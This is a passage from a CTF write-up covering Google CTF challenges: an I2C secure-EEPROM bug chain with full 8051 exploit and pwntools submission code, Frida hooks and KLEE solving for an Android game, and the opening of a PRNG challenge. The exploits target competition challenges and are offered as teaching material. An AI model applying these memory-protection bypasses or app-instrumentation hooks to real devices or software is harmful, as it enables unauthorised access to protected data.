But it’s not quite the security check we’re looking for. The only thing the read operation verifies is that the current address security level is the same as the next address security level. This means we cannot start a read operation in a non-secure bank, and keep reading bytes into a secure bank (because address #63 security level does not match address #64 security level). If there’s a difference between the current address security level and the next one – we’ll get a NACK, and the read operation will cease.

But what if we could somehow reach this state with a secure i2c_address? The condition would still be satisfied between address #64 and #65. We would probably be able to read from secure memory – nothing stops us from doing that. That’s bug #1.

Bug #2 – Don’t stop till you get enough

How do we provide i2c_address with a secure address? i2c_address is being set in the I2C_LOAD_CONTROL operation, so let’s take a look at it:

I2C_LOAD_ADDRESS: begin
  ...
  if (i2c_address_bits == 8) begin
    if (i2c_address_secure) begin
      i2c_address_valid <= 0;
      i2c_state <= I2C_NACK;
    end else begin
      i2c_data_bits <= 0;
      i2c_address_valid <= 1;
      i2c_state <= I2C_ACK_THEN_WRITE;
    end
  end else if (i2c_scl_state == I2C_SCL_RISING) begin
    i2c_address <= {i2c_address[6:0], i_i2c_sda};
    i2c_address_bits <= i2c_address_bits + 1;
  end
end

When loading 8 bits specifying an address, a check is being made. If the address is secure, we set the i2c_address_valid register to 0 – this address is invalid for either reading or writing. Otherwise, it’s kosher and i2c_address_valid is set to 1. So we cannot just load a secure address and ask the SEEPROM to start spilling the beans.
i2c_address_valid is also being set to 0 once we specify i2c_stop. This makes sense, as it re-initializes the register. But who says we have to play nice and specify an i2c_stop operation?

If we avoid using stop, we might be able to keep the i2c_address_valid set to 1, possibly reading some secure bytes. That’s bug #2.

Bug #3 – Read & Lock

i2c_address is either being set in an I2C_LOAD_ADDRESS operation, or when reading/writing. When we read 1 byte, SEEPROM promotes i2c_address by 1 so we’ll be able to read the next byte, immediately, without specifically addressing it again. This allows us to read multiple bytes in a row. But like we’ve already seen – the i2c_address is not being evaluated to make sure it’s valid, or secure. Only that it’s security level matches the next security level.

So what happens if we start reading a non-secure bank, at some point set this bank as secure, and continue reading? Will the security of the current address get re-evaluated? The answer is surprisingly no, and that’s bug #3.

We can start reading a non-secure bank, set it as secure, and continue the read operation – since the i2c_address validity does not necessarily get re-evaluated.

Chaining everything together

To sum everything up, here’s the operation we want to pull of, with the accomodating explanation.

Reminder: The flag is present in the 2nd bank, which should allow us to start reading the first, non-secure bank, and overflow into the 2nd, secure bank. Here’s how:

  • Start a regular read operation at address 62:
  • I2C_LOAD_CONTROL (I2C_CONTROL_EEPROM | 0):
    • i2c_control_prefix is equal to I2C_CONTROL_EEPROM:
      • i2c_control_rw is set to 0 (write) -> goto I2C_LOAD_ADDRESS
  • I2C_LOAD_ADDRESS (61):
    • i2c_address_secure is 0 (this address is not in a secure bank):
      • set i2c_address_valid to 1
  • I2C_START -> I2C_LOAD_CONTROL
  • I2C_LOAD_CONTROL (I2C_CONTROL_EEPROM | 1):
    • i2c_control_prefix is equal to I2C_CONTROL_EEPROM:
      • i2c_control_rw is set to 1 (read):
        • i2c_address_valid is set to 1 -> goto I2C_ACK_THEN_READ
  • I2C_READ … read 1 byte
    • i2c_address++
  • I2C_START -> I2C_LOAD_CONTROL
  • I2C_LOAD_CONTROL (I2C_CONTROL_SECURE | 0b0001):
    • i2c_control_prefix is equal to I2C_CONTROL_SECURE:
      • OR mem_secure with mask – 0b0001 (i2c_control_bank) => mem_secure now has the value 0b0011
    (BUG – should’ve re-evaluated i2c_address_valid)
  • I2C_START -> I2C_LOAD_CONTROL (BUG – we didn’t call stop, i2c_address_valid is not zeroed)
  • I2C_LOAD_CONTROL (I2C_CONTROL_EEPROM | 1):
    • i2c_control_prefix is equal to I2C_CONTROL_EEPROM:
      • i2c_control_rw is set to 1 (read):
        • i2c_address_valid is set to 1 -> goto I2C_ACK_THEN_READ
  • I2C_READ … read as many bytes as you want from secure memory banks!
    • i2c_address++ …
    (BUG – READ only checks current address security (e.g. 62), equals to the next (e.g. 63). They’re both 1, meaning secure, meaning read == FAIL).

Implementing an attack

We now have full understanding of the bug, and an idea how to exploit it. But we’re not quite there yet – how exactly do we send these commands to the I2C controller? RAW_I2C_SCL and RAW_I2C_SDA to the rescue!
Instead of communicating through the “proper channels”, we are going to bit-bang the I2C protocol ourselves on the bus, just like an attacker with physical access would.

Bit-banging

So how do we pull off this bit-banging? Conveniently, Looking in IDA on the flagrom binary, we can spot functions that implement the I2C controller. It provides an example how to do just that. Shown below are the relevant functions:

__int64 __fastcall send_start(__int64 a1)
{
  seeprom_write_scl(a1, 0LL);
  seeprom_write_sda(a1, 1LL);
  seeprom_write_scl(a1, 1LL);
  return seeprom_write_sda(a1, 0LL);
}

__int64 __fastcall send_byte(__int64 a1, unsigned int a2)
{
  __int64 result; // rax@1
  signed int i; // [rsp+1Ch] [rbp-4h]@1

  result = a2;
  for ( i = 0; i <= 7; ++i )
  {
    seeprom_write_scl(a1, 0LL);
    seeprom_write_sda(a1, (((signed int)(unsigned __int8)a2 >> (7 - i)) & 1) != 0);
    result = seeprom_write_scl(a1, 1LL);
  }
  return result;
}

__int64 __fastcall recv_byte(__int64 a1)
{
  signed int i; // [rsp+18h] [rbp-18h]@1
  unsigned __int8 v3; // [rsp+1Fh] [rbp-11h]@1

  v3 = 0;
  for ( i = 0; i <= 7; ++i )
  {
    seeprom_write_scl(a1, 0LL);
    seeprom_write_scl(a1, 1LL);
    v3 = 2 * v3 | seeprom_read_sda(a1);
  }
  return v3;
}

__int64 __fastcall recv_ack(__int64 a1)
{
  int v1; // eax@1

  seeprom_write_scl(a1, 0LL);
  seeprom_write_scl(a1, 1LL);
  LOBYTE(v1) = seeprom_read_sda(a1);
  return v1 ^ 1u;
}

And this is how the implementaion in our exploit.c looks like:

unsigned char bitbang_recv_byte() {
  int i;
  char c;
  for (i = 0; i<= 7; ++i) {
    RAW_I2C_SCL = 0;
    RAW_I2C_SCL = 1;
    c = (c << 1) | RAW_I2C_SDA ;
  }
  return c;
}

void bitbang_send_byte(unsigned char data) {
  int i;
  for (i = 0; i<= 7; ++i) {
    RAW_I2C_SCL = 0;    
    RAW_I2C_SDA = ((data >> (7-i)) & 1);
    RAW_I2C_SCL = 1;
  }
}

char bitbang_recv_ack(void) {
  char val = 0;
  RAW_I2C_SCL = 0;
  RAW_I2C_SCL = 1;
  val = RAW_I2C_SDA ^ 1;
  return val;
}

void bitbang_start() {
   RAW_I2C_SCL = 0;
   RAW_I2C_SDA = 1;
   RAW_I2C_SCL = 1;
   RAW_I2C_SDA = 0;
}

Capture the Flag

We now have all the necessary primitives to conduct our attack. This is how it goes:

void bitbang_read_flag(unsigned char addr) {
  char c;
  int i = 0;
  // WRITE operation
  bitbang_start();
  bitbang_send_byte(SEEPROM_I2C_ADDR_MEMORY | 0); 
  bitbang_recv_ack();

  //LOAD address
  bitbang_send_byte(addr);
  bitbang_recv_ack();

  // READ 1 byte
  bitbang_start();
  bitbang_send_byte(SEEPROM_I2C_ADDR_MEMORY | 1); 
  bitbang_recv_ack();
  MYBUF[i] = bitbang_recv_byte();

  // SECURE address
  bitbang_start();
  bitbang_send_byte(SEEPROM_I2C_ADDR_SECURE | 0b0001);
  bitbang_recv_ack();

  // READ operation
  bitbang_start();
  bitbang_send_byte(SEEPROM_I2C_ADDR_MEMORY | 1);
  bitbang_recv_ack();

  // READ 64 bytes
  for (i=1; i<64; i++) {
    MYBUF[i] = bitbang_recv_byte();
    bitbang_recv_ack();
  }
}

//Prints a temporary 0x100 bytes buffer
void printMYBUFF()
{
  int i = 0;
  for(i=0; i<0x100; i++)
  {
    CHAROUT = MYBUF[i];
  }
}

void main(void) {
  int i;
  for (i = 0; i<0x100; ++i) {
    MYBUF[i] = 0x42;  
  }
  MYBUF[i] = 0;

  bitbang_read_flag(61);
  printMYBUFF();
  POWEROFF = 1;

}

…And with that, we’re finished! We can now grab the flag off the server.

Executing firmware...
[FW] Writing flag to SecureEEPROM...............DONE
[FW] Securing SecureEEPROM flag banks...........DONE
[FW] Removing flag from 8051 memory.............DONE
[FW] Writing welcome message to SecureEEPROM....DONE
Executing usercode...
\x00\x00\x00On the real server the flag is loaded here.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

Summary

This was a really nice challenge, which introduced cool HW exercises, in a comfortable SW environment. We hope to see more of these in the future :). Thanks again g00gle for the awesome CTF!

Even though the write-up is pretty “linear” in nature, it took us time figuring everything out, and we obviously made a lot of mistakes and guesses along the way… but that’s the fun part, isn’t it?

We hope that you’ve found this write-up educating, abd learned a little bit about HW, protocols, and analyzing Verilog code.

See you next year!

Appendix A. Verilog crash course using seeprom.sv example

The goal of this Appendix is not to make you Verilog expert, but rather provide you the minimal tools necessary to understand the seeprom.sv code. We won’t explain the whole code, just a few key examples taken from the code, which we believe will enable you to read the code yourself and understand its operation.

Verilog, unlike a programming language, is a hardware description language. This means it does not describe a program, but hardware. Hardware is made of wires, connecting point A to point B, logic gates – allowing us to implement some combinatorial logic, and flip-flops, allowing us to implement sequential logic.
Combinatorial logic happens at once (for the scope of our discussion). A circuit like A XOR B AND C is just some wires and gates connected together.
Sequential logic has a sense of time, and thus requires a clock. A register for example, stores or changes value over time.

In Verilog, we describe the logic we would like the hardware to perform. The code usually ends up as some state-machine, doing a specific task. There’s a nice reference slide here, and we’ll try to get you up to speed with the syntax, only to be able to read and understand the seeprom.sv operation – nothing more.

Let’s start with the module’s definition:

module seeprom (
  input i_clk,
  input logic i_i2c_scl,
  input logic i_i2c_sda,
  output logic o_i2c_sda
);

This section describes the circuit’s interface. Think of it as a black box that has input and output lines. Here we have 3 inputs and 1 output:

  • i_clk – This line receives master clock signal. This clock always ticks.
  • i_i2c_scl, i_i2c_sda – These lines are input lines representing data I2C clock line and I2C data line. The difference is that this clock has specific functions for I2C, while the previous one has to tick in order for the circuit to work.
  • o_i2c_sda – Data output line.
    We can only READ from an input line, and we can only WRITE to an output line.

All the rest of the logic defined in the file is internal logic inside the circuit.

Now let’s talk about the difference between wire and logic:

logic i2c_last_scl;
wire i2c_control_rw = i2c_control[0];
  • logic defines a register, which stores a value over time, and its value can change according to some logic.
  • wire defines a connection between A and B. In this example, i2c_control_rw is a wire, connected to the lsb of the i2c_control register.

Both registers, and wires, can have multiple bits, as shown in the examples below:

logic [3:0] mem_secure;
wire [3:0] i2c_control_bank = i2c_control[3:0];

In both these of examples, a 4-bit declaration is shown (0-3).

Now, how do we perform slightly more complicated logic than connecting some wires? That’s how:

always_ff @(posedge i_clk) begin
always_comb begin

An always clause specifies an action has to always take place, with respect to the operation. You can think of it like an endless loop. Either it’s a combinatorial operation (comb), or a sequential operation (ff – flip-flop). When specifying a sequential operation, we have to specify what’s the clock signal we evaluate – in this example – a tick is every positive edge of i_clk signal.

Assignments for wires and registers vary:

i2c_start = i2c_last_sda && !i_i2c_sda;
i2c_state <= I2C_START;

Pay attention that assigning value to a wire uses = while assigning to a register uses <=. We won’t explain the reason (you can look it up), only specify that the syntax is legal.

Finally, there’s another assignment syntax that’s worth explaining since it’s being used:

i2c_control <= {i2c_control[6:0], i_i2c_sda};

This line takes the 7 LSB of i2c_control (0-6) and one bit from i_i2c_sda and puts them back into i2c_control register. It’s equivalent to shifting the i2c_control bits left, and inserting one bit from i_i2c_sda.
This syntax is used a lot when we want to read a full byte from the data line, and then evalute its contents.

You should now have enough knowledge to be able to take on the seeprom.sv file on your own. We recommend breaking down the big loop and understand its operation properly.

Good luck!

Appendix B. I2C crash course

Intro

Very shortly, I2C is an inter-integrated chip bus – a protocol for different hardware components to communicate (e.g.: A CPU and an EEPROM). Since this protocol is about different hardware parts comunicating with one another, it has two lines: a clock line and a data line.

The clock line is used to synchronize the two components to read & write at agreed upon intervals, and the data line is used to send and receive the actual bits.

Bit Banging

There’s a really good description of the signaling part of the protocol here, and we encourage you to read it (just the protocol clause). It will help you understand how the “bit-banging” works – the process of sending bits from point A to point B.

Once you’ve wrapped your head around the protocol, it’s easy to understand this Verilog state machine code, present in seeprom.sv:

always_comb begin
  if (i2c_last_scl && i_i2c_scl) begin
    i2c_scl_state = I2C_SCL_STABLE_HIGH;
  end else if (!i2c_last_scl && !i_i2c_scl) begin
    i2c_scl_state = I2C_SCL_STABLE_LOW;
  end else if (i2c_last_scl && !i_i2c_scl) begin
    i2c_scl_state = I2C_SCL_FALLING;
  end else if (!i2c_last_scl && i_i2c_scl) begin
    i2c_scl_state = I2C_SCL_RISING;
  end
end

always_comb begin
  if (i2c_scl_state == I2C_SCL_STABLE_HIGH) begin
    i2c_start = i2c_last_sda && !i_i2c_sda;
    i2c_stop = !i2c_last_sda && i_i2c_sda;
  end else begin
    i2c_start = 0;
    i2c_stop = 0;
  end
end

This code shifts between the various states of I2C, according to the protocol. As an exercise, you can look at how the start & stop conditions are implemented, and see that they indeed match the definitions present in the provided link.
It’s also relatively easy to see that this logic does not seem to be flawed, and the bug is probably not present here.

The start signal signals the devices on the bus to get ready, for a transaction is about to take place. The stop signal, signals it’s finished. Transactions are answered with ACK/NACK, to signal if the requested operation was successful or not.

A little more logic

Now that you understand how the signaling (start, stop, send bit, receive bit) works, let’s talk about the logical level beyond the bits. There can be several different devices on the bus, and we want to be able to address different devices. Thus – the first byte we will transmit on the bus, will be the addressing byte. This byte is composed of 7 bits of address, and one bit that specifies the operation we would like to perform – either write (0) or read (1). For example:

|      ADDR   | r/w |
|   1010000   |  0  |
|        0xa0       |

The bits 0b10100000 (0xa0) means that we would like to perform a write operation to address 0x50.

Once we send the address bytes with the proper operation, we can start writing a message to the device, or receive data from it. It really depends how the device was implemented and what bytes it might expect or send. There are standards, but we will not elaborate about them in this scope.

|      ADDR   | r/w | |   DATA   | |  ...  |
|   1010000   |  0  | | 11111111 | |  ...  |
|        0xa0       | |   0xFF   | |  ...  |

I2C Controller

Writing C code to perform all this bit-banging process is a lot of work, and prone to errors. Instead, users who wish to communicate with other devices on the bus use an I2C controller. This is a device we can communicate with using a defined interface, which usually would be much easier, than having to implement the entire protocol. Simply state the address and data, and the I2C controller would deliver the data on the bus. Such controllers are very common, each having its own interface.

Summary

That’s about it – not too hard, and we spared you the uglier details. The key takeaways relevant for this exercise:

  • The bit-banging part in seeprom.sv seems solid – the problem is probably in the state-machine implementation (i.e. the protocol layer, not the signaling layer).
  • I2C uses one address byte, and then sends or receives data, depending on the operation.
  • I2C transactions start with a start signal and stops with a stop signal.

Appendix C. Source Code:

// exploit.c

__sfr __at(0xff) POWEROFF;
__sfr __at(0xfd) CHAROUT;

__xdata __at(0xee00) unsigned char MYBUF[0x100];

__sfr __at(0xfa) RAW_I2C_SCL;
__sfr __at(0xfb) RAW_I2C_SDA;

const SEEPROM_I2C_ADDR_MEMORY = 0b10100000; // 0xa0
const SEEPROM_I2C_ADDR_SECURE = 0b01010000; // 0x50

void printMYBUFF()
{
  int i = 0;
  for(i=0; i<0x100; i++)
  {
    CHAROUT = MYBUF[i];
  }
}

unsigned char bitbang_recv_byte() {
  int i;
  char c;
  for (i = 0; i<= 7; ++i) {
    RAW_I2C_SCL = 0;
    RAW_I2C_SCL = 1;
    c = (c << 1) | RAW_I2C_SDA ;
  }
  return c;
}

void bitbang_send_byte(unsigned char data) {
  int i;
  for (i = 0; i<= 7; ++i) {
    RAW_I2C_SCL = 0;    
    RAW_I2C_SDA = ((data >> (7-i)) & 1);
    RAW_I2C_SCL = 1;
  }
}

char bitbang_recv_ack(void) {
  char val = 0;
  RAW_I2C_SCL = 0;
  RAW_I2C_SCL = 1;
  val = RAW_I2C_SDA ^ 1;
  return val;
}

void bitbang_start() {
   RAW_I2C_SCL = 0;
   RAW_I2C_SDA = 1;
   RAW_I2C_SCL = 1;
   RAW_I2C_SDA = 0;
}

void bitbang_read_flag(unsigned char addr) {
  char c;
  int i = 0;
  // WRITE operation
  bitbang_start();
  bitbang_send_byte(SEEPROM_I2C_ADDR_MEMORY | 0); 
  bitbang_recv_ack();

  //LOAD address
  bitbang_send_byte(addr);
  bitbang_recv_ack();

  // READ 1 byte
  bitbang_start();
  bitbang_send_byte(SEEPROM_I2C_ADDR_MEMORY | 1); 
  bitbang_recv_ack();
  MYBUF[i] = bitbang_recv_byte();

  // SECURE address
  bitbang_start();
  bitbang_send_byte(SEEPROM_I2C_ADDR_SECURE | 0b0001);
  bitbang_recv_ack();

  // READ operation
  bitbang_start();
  bitbang_send_byte(SEEPROM_I2C_ADDR_MEMORY | 1);
  bitbang_recv_ack();

  // READ 64 bytes
  for (i=1; i<64; i++) {
    MYBUF[i] = bitbang_recv_byte();
    bitbang_recv_ack();
  }
}

void main(void) {
  int i;
  for (i = 0; i<0x100; ++i) {
    MYBUF[i] = 0x42;  
  }
  MYBUF[i] = 0;

  bitbang_read_flag(61);
  printMYBUFF();
  POWEROFF = 1;

}
# exploit.py

import hashlib
import string
import socket
from sys import argv

from pwn import remote
from pwn import *

def get_pow(prefix):
    m = hashlib.md5()
    for c1 in string.printable:
        for c2 in string.printable:
            for c3 in string.printable:
                for c4 in string.printable:
                    for c5 in string.printable:
                        s = 'flagrom-' + c1 + c2 + c3 + c4 + c5
                        if hashlib.md5(s).hexdigest().startswith(prefix):
                            return s


def local_ctf():
    p = tubes.process.process('flagrom');
    do_all(p)

def remote_ctf():
    p = remote('flagrom.ctfcompetition.com', 1337)
    do_all(p)

def do_all(s):
    res = s.recvline()
    print res
    prefix = res.split(' ')[-1][:-2]
    print 'prefix: %s' % prefix    
    resp = get_pow(prefix)
    print 'found md5: %s' % resp
    s.sendline(resp)

    res = s.recvline()
    print res
    f = open('exploit.8051', 'rb')
    data = f.read()
    f.close()
    print 'sending response: %d\n' % len(data)

    s.sendline('%d' % len(data))
    s.sendline(data)
    s.interactive()

def main():
    #local_ctf()
    remote_ctf()

if __name__ == '__main__':
    main()

flaggybird

Overcome insurmountable obstacles then find the secret combination to get the flag.

The attached ZIP contains an APK (875.9KB)

To pass the first & second levels you need to jump from the ground to the top floor, if you miss you fall back to the start, pretty exhausting, would be easier if we could jump higher.

We searched for the string “GROUND” and found the enum @ com.google.ctf.game.f$a#a, followed the xref to com.google.ctf.game#a

   private void a(c _c) {
        _c.c += 0.9f;
        _c.a.e -= _c.c;
        int v0 = (((int)(_c.a.e + _c.b.e))) / this.a.f;
        int v1 = (((int)(_c.a.e + _c.b.e / 2f))) / this.a.f;
        int v2 = (((int)_c.a.e)) / this.a.f;
        int v4 = (((int)_c.a.d)) / this.a.e;
        int v3 = (((int)(_c.a.d + _c.b.d / 2f))) / this.a.e;
        int v5 = (((int)(_c.a.d + _c.b.d))) / this.a.e;
        int v6 = this.a.c[v2][v4] == _enum._ground && this.a.c[v2][v3] == _enum._ground || this.a.c[v2][v5] == _enum._ground && this.a.c[v2][v3] == _enum._ground ? 1 : 0;
        int v3_1 = this.a.c[v0][v4] == _enum._ground && this.a.c[v0][v3] == _enum._ground || this.a.c[v0][v5] == _enum._ground && this.a.c[v0][v3] == _enum._ground ? 1 : 0;
        int v4_1 = this.a.c[v1][v4] == _enum._ground ? 1 : 0;
        int v1_1 = this.a.c[v1][v5] == _enum._ground ? 1 : 0;
        if(v3_1 != 0) {
            _c.a.e = (float)(this.a.f * (v0 - 1));
            _c.c = 0f;
        }
        else if(v6 != 0) {
            _c.a.e = (float)(this.a.f * (v2 + 1));
            _c.c = 0f;
            _c.f = false;
        }
       ...

We used Frida to jump higher

// $ frida -Uf com.google.ctf.game --no-pause --enable-jit -e 
Java.perform(() => {
 Java.use('com.google.ctf.game.g').a.overload('com.google.ctf.game.c').implementation = function(_c) {
    Java.cast(_c, Java.use('com.google.ctf.game.c')).c.value -= 0.7; // original value = 0.5
    this.a(_c);
  }
})

To pass the last level (3) we need to put in order 15 eggs inside optional 16 pairs (total 32) of boxes,
afterwards we need to get to the highest floor and click on the computer icon which will calculate if the eggs in the right order.

“Close, but no cigar.” is the popup you will get if the eggs are not in order.

The computer icon invokes the native method from the class com.google.ctf.game.Checker#nativeCheck and pass a byte array which represents the eggs positions.

If this function returns true – it passes it on further to check the SHA256 of the key – if it equals a specific hardcoded value it goes on to decrypt the cipher text (again hardcoded) using the key and some hardcoded IV.

This really looked suspicious to us – since there is really no need to run a check twice on a key… just try to decrypt it and validate the result if you must… so it must be a clue 🙂

The APK contains the native library called rary – so library.so (cudos for the pun :))
We loaded it into IDA and saw that it has 3 main function.

nativeCheck

    int __fastcall Java_com_google_ctf_game_Checker_nativeCheck(JNINativeInterface **a1, int a2, int a3)
    {
      JNINativeInterface **v3; // r5
      int v4; // r4
      int v6; // [sp+0h] [bp-30h]

      v3 = a1;
      v4 = a3;
      if ( ((int (__fastcall *)(JNINativeInterface **, int))(*a1)->GetArrayLength)(a1, a3) != 32 )
        return 0;
      qmemcpy(&v6, (const void *)((int (__fastcall *)(JNINativeInterface **, int, _DWORD))(*v3)->GetByteArrayElements)(v3, v4, 0),       0x20u);
      return C((char *)&v6);
    }

C function:

    int __fastcall C(char *a1)
    {
      int i; // r1
      char v2; // r4
      char v4[15]; // [sp+4h] [bp-1Ch]
      unsigned __int8 v5; // [sp+13h] [bp-Dh]

      for ( i = 0; i != 16; ++i )
        v4[i] = a1[2 * i] + a1[2 * i + 1];
      v2 = 0;
      p = 0;
      c = 1;
      M(v4, 16);
      if ( v5 < 0x10u )
        v2 = 1;
      return (c != 0) & (unsigned __int8)v2;
    }

M function:

  char *v2; // r11
  unsigned int v3; // r10
  signed int v4; // r9
  int v5; // r6
  int v6; // r3
  int v7; // r4
  int v8; // r5
  signed int v9; // r8
  unsigned int v10; // r2
  unsigned int v11; // r1
  char v12; // r1
  int v14; // [sp+14h] [bp-34h]
  char v15[16]; // [sp+18h] [bp-30h]
  int v16; // [sp+28h] [bp-20h]

  v2 = a1;
  v3 = a2;
  if ( a2 >= 2 )
  {
    v4 = (unsigned int)a2 >> 1;
    M(a1, (unsigned int)a2 >> 1);
    if ( c )
    {
      v5 = (int)&v2[v3 >> 1];
      M(&v2[v3 >> 1], v3 - (v3 >> 1));
      if ( c )
      {
        v6 = v3 - (v3 >> 1);
        v14 = v3 - (v3 >> 1);
        if ( (int)(v3 - (v3 >> 1)) >= 1 )
        {
          v7 = 0;
          v8 = 0;
          v9 = 0;
          while ( 1 )
          {
            v10 = *(unsigned __int8 *)(v5 + v8);
            v11 = (unsigned __int8)v2[v9];
            if ( v11 >= v10 )
            {
              if ( v11 <= v10 || d[p] )
              {
LABEL_21:
                c = 0;
                return _stack_chk_guard - v16;
              }
              ++p;
              v12 = *(_BYTE *)(v5 + v8++);
            }
            else
            {
              if ( d[p] != 1 )
                goto LABEL_21;
              v6 = v14;
              ++p;
              v12 = v2[v9++];
            }
            v15[v7++] = v12;
            if ( v9 >= v4 || v8 >= v6 )
              goto LABEL_16;
          }
        }
        v9 = 0;
        v8 = 0;
        v7 = 0;
LABEL_16:
        if ( v4 > v9 )
        {
          qmemcpy(&v15[v7], &v2[v9], v4 - v9);
          v6 = v14;
          v7 = v7 + v4 - v9;
        }
        if ( v8 < v6 )
          qmemcpy(&v15[v7], &v2[v8 + v4], v3 - v8 - v4);
        qmemcpy(v2, v15, v3);
      }
    }
  }
  return _stack_chk_guard - v16;

As you can see – it ain’t pretty…

It looks like the C function takes the sum of each two cells (eggs) and creates a new array of length 16.
This array is passed to the M function.
M is the main logic which does some wierd annoying recursive algorithm which looks like merge sort – but it uses an external array d[p] to decide on things – this was hardcoded.

Rather than understand this function we loaded it into KLEE and let it figure it out for us.
It quickly gave us one solution. This was a good sign 🙂
So now all we had to do was take the 16 values and expand them to 32 (there are not too many and we can validate using the SHA256 on the key).

We now had the correct egg combination to enter in the game.

code we passed to KLEE

#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#ifdef KLEE
#include <klee/klee.h>
#endif

int g_stop_flag = 1;
/* we need to figure this value out...*/
char g_aux_arr[45] = {0, 0, 0, 0, 1, 0, 0, 1, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 1, 0, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0};
int g_aux_index = 0;

int test_func(char *pairs_sum_arr, int size)
{
  signed int half_arr; // r9
  char* mid_ptr; // r6
  int starting_half_size; // r3
  int v7; // r4
  int i; // r5
  signed int j; // r8
  char val_i; // r2
  char v11; // r1
  char v12; // r1
  int current_half_size; // [sp+14h] [bp-34h]
  char v15[16]; // [sp+18h] [bp-30h]
  int v16; // [sp+28h] [bp-20h]

  if ( size >= 2 )
  {
    printf("testing with size: %d\n", size);
    half_arr = (unsigned int)size >> 1;
    test_func(pairs_sum_arr, (unsigned int)size >> 1);
    if ( g_stop_flag )
    {
      mid_ptr = &pairs_sum_arr[(unsigned int)size >> 1];
      test_func(&pairs_sum_arr[(unsigned int)size >> 1], size - ((unsigned int)size >> 1));
      if ( g_stop_flag )
      {
        starting_half_size = size - ((unsigned int)size >> 1);
        current_half_size = size - ((unsigned int)size >> 1);
        if ( (int)(size - ((unsigned int)size >> 1)) >= 1 )
        {
          v7 = 0;
          i = 0;
          j = 0;
          while ( 1 )
          {
            printf("in while\n");
            val_i = *(char *)(mid_ptr + i);
            v11 = pairs_sum_arr[j];
            if ( v11 >= val_i )
            {
              printf("v11 >= val_i\n");
              if ( v11 <= val_i || g_aux_arr[g_aux_index] )
              {
LABEL_21:
                printf("got to the exit and g_stop_flag = 0\n");
                g_stop_flag = 0;
                return g_stop_flag;
              }
              ++g_aux_index;
              v12 = *(char *)(mid_ptr + i++);
            }
            else
            {
              printf("got to the else case\n");
              if ( g_aux_arr[g_aux_index] != 1 ){
                goto LABEL_21;
              }
              starting_half_size = current_half_size;
              ++g_aux_index;
              v12 = pairs_sum_arr[j++];
            }
            printf("assing to v15\n");
            v15[v7++] = v12;

            if ( j >= half_arr || i >= starting_half_size )
              goto LABEL_16;
          }
        }
        j = 0;
        i = 0;
        v7 = 0;
LABEL_16:
        if ( half_arr > j )
        {
          printf("got to memcpy1\n");
          memcpy(&v15[v7], &pairs_sum_arr[j], half_arr - j);
          starting_half_size = current_half_size;
          v7 = v7 + half_arr - j;
        }
        if ( i < starting_half_size ) {
          printf("got to memcpy2\n");
          memcpy(&v15[v7], &pairs_sum_arr[i + half_arr], size - i - half_arr);
        }
        printf("got to memcpy3\n");
        memcpy(pairs_sum_arr, v15, size);
      }
    }
  }
  return g_stop_flag;

}

int main(int argc, char *argv[])
{
    // char in_array[16] = {1, 2, 3, 4, 5, 6 ,7 ,8 ,9 ,10 ,11, 12, 13, 14, 15, 0};
    char in_array[16] = {0};
    int i;
    int res;
    char cur = 0;


    #ifdef KLEE
    klee_make_symbolic(in_array, sizeof(in_array), "in_array");

    for (i = 0; i < sizeof(in_array); ++i) {
        klee_assume((in_array[i] <= 0x20) && (in_array[i] >= 0));
    }
    #else
    printf("opening %s\n", argv[1]);
    int fd = open(argv[1], O_RDONLY);
    if (fd < 0) {
        printf("open error\n");
        return 2;
    }
    read(fd, in_array, sizeof(in_array));
    close(fd);

    for (int j =0; j < sizeof(in_array); j++) {
        printf("%02x ", in_array[j]);
    }
    printf("\n");
    #endif


    if (test_func(in_array, 16) != 1) {
        return 0;
    }

   res = in_array[sizeof(in_array)-1] < 0x10;

   if (res) {
       printf("good sample\n");
   }

   return res;
}

python script we used to expand the 16 bytes array into the 32 eggs array

    import struct
    import hashlib

    pair_sum = [9, 8, 7, 2, 11, 15, 13, 10, 6, 5, 14, 4, 3, 0, 12, 1]

    def product(*args, **kwds):
        # product('ABCD', 'xy') --> Ax Ay Bx By Cx Cy Dx Dy
        # product(range(2), repeat=3) --> 000 001 010 011 100 101 110 111
        pools = map(tuple, args) * kwds.get('repeat', 1)
        result = [[]]
        for pool in pools:
            result = [x+[y] for x in result for y in pool]
        for prod in result:
            yield tuple(prod)

    def make_keys():
        for z in product(*[((x, 0), (0, x)) for x in pair_sum]):
            yield z

    l = [46, 50, 92, -111, -55, 20, 120, -77, 92, 46, 12, -74, 91, 120, 81, -58, -6, -104, -123, 90, 119, -61, -65, -45, -16, 8, 64, -68, -103, -84, -30, 107]
    expected_hash = struct.pack("b" * len(l), *l)

    for z in make_keys():
        m = hashlib.sha256()
        key = struct.pack("B" * 32, *sum(z, tuple()))
        m.update(key)
        if m.digest() == expected_hash:
            print "found key:", key.encode('hex')
            print z

script to place the eggs

Java.perform(() => { 
    Java.choose('com.google.ctf.game.f', {
        onMatch: f => {
            [9, 0, 0, 8, 0, 7, 2, 0, 0, 11, 0, 15, 13, 0, 10, 0, 6, 0, 0, 5, 14, 0, 0, 4, 0, 3, 0, 0, 12, 0, 1, 0
].forEach((egg, box) => f.a(box, egg));
        }, 
        onComplete: () => {}
    }) 
})

This revealed a new level with the flag

Doomed to Repeat It

The challenge starts with the following text:

Play the classic game Memory. Feel free to download and study the source code.

you can either press a link to play the game online or download a zip file containing the game source code (in go).

We first tried playing the game a few time to understand the challege. It is a simple memory game with a 7*8 grid of cards. Each card is a number and it appears like you have to solve the game. The catch is that you only have 60 cards to pickup and 10 seconds for each card.
If the shuffeling of the cards is done right – this game should be impossible to solve by. So we turn to the source code.

We have 3 source files – main.go, game.go and random.go – Main contains the HTTP server logic, game contains the game logic and random is a custom implementation of a psudo-random number generator. Looking at the random.go we can describe the randomness generation as follows:

  1. The function OsRand – Generates an 8 byte random from the OS BUT multiplies it by 14496946463017271296 (0xc92f800000000000) – a very large number, this is used as the seed.
